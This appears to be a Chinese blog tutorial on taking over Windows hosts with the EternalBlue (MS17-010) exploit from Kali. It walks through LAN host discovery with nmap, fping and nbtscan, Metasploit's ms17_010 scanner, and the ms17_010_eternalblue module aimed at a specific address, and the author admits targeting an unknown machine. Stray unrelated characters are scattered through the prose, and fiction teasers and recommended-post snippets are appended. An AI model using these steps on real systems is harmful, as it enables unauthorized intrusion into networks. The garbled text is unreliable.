kali利用永恒之藍(lán)獲取主機權(quán)限

  1. 編輯kali的源為國內(nèi)源
    1.#阿里云Kali源
    2.deb http://mirrors.aliyun.com/kali kali main non-free contrib 
    3.deb-src http://mirrors.aliyun.com/kali kali main non-free contrib 
    4.deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free
  1. 更新應(yīng)用
apt-get update && apt-get upgrade && apt-get dist-upgrade
  1. 更新系統(tǒng)內(nèi)核
apt-get install linux-headers-$(uname -r)
  1. 如果報錯可以試試這個
aptitude -r install linux-headers-$(uname -r
  1. 主機存活檢測
# fping 工具 kali自帶
fping -asg 192.168.1.0/24
1.jpg
# nbtscan工具 kali自帶
nbtscan -r 192.168.1.0/24
2.jpg
# nmap ping 包掃描
nmap -n -sS 192.168.1.0/24
# 指定端口發(fā)現(xiàn)掃描
nmap -n -p445 192.168.1.0/24 --open
# 針對漏洞腳本的定向掃描
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
# 個人推薦使用 nmap -n -p445 192.168.1.0/24 --open 其掃描發(fā)現(xiàn)的效率最高。
3.jpg
  1. MSF Auxiliary 輔助掃描
msfconsole # 進入MSF框架 
version # 確認(rèn)下MSF的版本 
search ms17_010 # 查找漏洞模塊的具體路徑 
use auxiliary/scanner/smb/smb_ms17_010 # 調(diào)用漏洞掃描模塊 
show options # 查看模塊配置選項 
set RHOST 192.168.1.1-254 # 配置掃描目標(biāo) 
set THREADS 30 #配置掃描線程 
run #運行腳本
  1. 這個使用下來饭聚,我們發(fā)現(xiàn)其實還沒有namp 一條命令就搞定了仆百,來的方便慌闭。
  2. 上邊的都是為了掃描開放端口的主機初坠,接下來利用漏洞獲取權(quán)限
ms17-010 漏洞利用之MSF使用方法
msfconsole # 進入MSF 框架 
version # 確保MSF框架版本在 4.14.17以上箕别; 
search ms17_010 # 漏洞模塊路徑查詢 
use exploit/windows/smb/ms17_010_eternalblue # 調(diào)用攻擊模塊
set RHOST 192.168.1.112 # 設(shè)定攻擊目標(biāo) 
exploit # 發(fā)起攻擊
  1. 查找漏洞模塊路徑


    4.jpg
  2. 調(diào)用和配置exploit攻擊參數(shù)


    5.jpg
  3. 設(shè)置工具目標(biāo)


    6.jpg
  4. 發(fā)起攻擊 exploit 或者 run


    7.jpg
  5. 我手動終止了铜幽,不知道這是什么機器,不亂搞了串稀,如果成功會直接返回會話(看各位的運氣了除抛!)
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市母截,隨后出現(xiàn)的幾起案子到忽,更是在濱河造成了極大的恐慌,老刑警劉巖清寇,帶你破解...
    沈念sama閱讀 218,451評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件喘漏,死亡現(xiàn)場離奇詭異,居然都是意外死亡华烟,警方通過查閱死者的電腦和手機翩迈,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,172評論 3 394
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來盔夜,“玉大人负饲,你說我怎么就攤上這事搅方。” “怎么了绽族?”我有些...
    開封第一講書人閱讀 164,782評論 0 354
  • 文/不壞的土叔 我叫張陵姨涡,是天一觀的道長。 經(jīng)常有香客問我吧慢,道長涛漂,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,709評論 1 294
  • 正文 為了忘掉前任检诗,我火速辦了婚禮匈仗,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘逢慌。我一直安慰自己悠轩,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,733評論 6 392
  • 文/花漫 我一把揭開白布攻泼。 她就那樣靜靜地躺著火架,像睡著了一般。 火紅的嫁衣襯著肌膚如雪忙菠。 梳的紋絲不亂的頭發(fā)上何鸡,一...
    開封第一講書人閱讀 51,578評論 1 305
  • 那天,我揣著相機與錄音牛欢,去河邊找鬼骡男。 笑死,一個胖子當(dāng)著我的面吹牛傍睹,可吹牛的內(nèi)容都是我干的隔盛。 我是一名探鬼主播,決...
    沈念sama閱讀 40,320評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼拾稳,長吁一口氣:“原來是場噩夢啊……” “哼吮炕!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起熊赖,我...
    開封第一講書人閱讀 39,241評論 0 276
  • 序言:老撾萬榮一對情侶失蹤来屠,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后震鹉,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,686評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡捆姜,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,878評論 3 336
  • 正文 我和宋清朗相戀三年传趾,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片泥技。...
    茶點故事閱讀 39,992評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡浆兰,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情簸呈,我是刑警寧澤榕订,帶...
    沈念sama閱讀 35,715評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站蜕便,受9級特大地震影響劫恒,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜轿腺,卻給世界環(huán)境...
    茶點故事閱讀 41,336評論 3 330
  • 文/蒙蒙 一两嘴、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧族壳,春花似錦憔辫、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,912評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至拢操,卻和暖如春枉圃,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背庐冯。 一陣腳步聲響...
    開封第一講書人閱讀 33,040評論 1 270
  • 我被黑心中介騙來泰國打工孽亲, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人展父。 一個月前我還...
    沈念sama閱讀 48,173評論 3 370
  • 正文 我出身青樓返劲,卻偏偏與公主長得像,于是被迫代替她去往敵國和親栖茉。 傳聞我的和親對象是個殘疾皇子篮绿,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,947評論 2 355

推薦閱讀更多精彩內(nèi)容

  • Metasploit-ms17-010 永恒之藍(lán) 永恒之藍(lán)是去年玩剩下的了,記得當(dāng)初剛剛泄露的時候吕漂,用的是 NSA...
    Jarodlu閱讀 4,284評論 0 0
  • 一 漏洞及漏洞發(fā)掘方法 漏洞亲配,是指在硬件、軟件惶凝、協(xié)議實現(xiàn)或系統(tǒng)安全策略上存在缺陷吼虎,攻擊者能夠在未授權(quán)的情況下對系統(tǒng)...
    kaitoulee閱讀 15,220評論 0 30
  • Metasploit基本介紹與配置 Metasploit作為一個非常全面的滲透工具,用來收集信息非常好用苍鲜,信息收集...
    yingtaomj閱讀 2,750評論 0 2
  • 作者:Gilberto Najera-Gutierrez譯者:飛龍協(xié)議:CC BY-NC-SA 4.0 簡介 這章...
    三月行者閱讀 1,895評論 2 7
  • 對我這樣一個偶爾才激起思考熱情的人來說思灰,讀卡夫卡始終是一種受罪。對一團隨時彌漫的巨大的思想的迷霧混滔,你就是一直盯...
    尤其拉閱讀 238評論 2 5